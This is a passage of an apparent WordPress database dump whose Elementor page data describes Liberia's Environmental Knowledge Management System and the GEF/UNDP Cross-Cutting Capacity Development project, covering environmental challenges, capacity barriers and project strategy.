Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\"}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34493,4994,'_elementor_pro_version','3.3.6'),(34494,4995,'_elementor_edit_mode','builder'),(34495,4995,'_elementor_template_type','wp-page'),(34496,4995,'_elementor_version','3.4.0'),(34497,4995,'_wp_page_template','default'),(34498,4995,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\"}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p>The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project developed is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\"}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System 